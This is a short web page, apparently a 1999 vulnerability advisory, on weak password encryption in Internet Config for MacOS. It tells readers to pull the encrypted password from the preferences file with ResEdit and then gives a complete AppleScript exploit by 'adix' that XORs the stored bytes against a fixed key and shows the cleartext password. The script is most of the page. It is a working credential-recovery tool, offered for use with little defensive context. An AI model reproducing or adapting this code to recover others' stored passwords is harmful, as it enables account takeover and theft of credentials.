|
|
Internet Config for MacOS Weak Password Encryption Vulnerability
Find an encrypted password in the Internet Preferences file in the Preferences folder using a resource editor like ResEdit. Discard the first byte as it is merely the length of the password. AppleScript exploit by Dawid adix Adamski: (* IC Pass 2.1 by adix 21.07.99; Apple Script English *) set hex1 to text returned of (display dialog "Enter encrypted password:" default answer "" buttons {" Ok "} default button " Ok ") set Alicia to "01010110010101110101100001011001010110100101101101011100010111010101111001011111" set pass to "" set i to 1 set skok to 0 set ile to count items in hex1 if ile = 1 or ile = 0 then set pass to "" else repeat until (i > (ile - 1)) set kodascii to 0 set zn to items (i) thru (i + 1) in hex1 set lbin to hex2bin(zn) as string repeat with a from 1 to 8 set bit2 to item (a + skok) of Alicia set bit1 to item a of lbin if (bit1 = bit2) then set bitk to "0" else set bitk to "1" end if set kodascii to {kodascii + bitk * (2 ^ (8 - a))} end repeat set pass to {pass & (ASCII character kodascii)} set skok to skok + 8 set i to i + 2 end repeat end if display dialog "Password: " & pass & return & return & "by adix" buttons {" Ok "} default button " Ok " on hex2bin(zn) set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111", "1000", "1001", "1010", "1011", "1100", "1101", "1110", "1111"} set t2hex to "0123456789ABCDEF" set bin to "" as string repeat with j in zn set t1 to j as string repeat with i from 1 to (count items in t2hex) if ((item i in t2hex) = t1) then set temp to (item i in temphex) exit repeat end if end repeat set bin to {bin & temp} as string end repeat return (bin) end hex2bin |
|
Privacy Statement |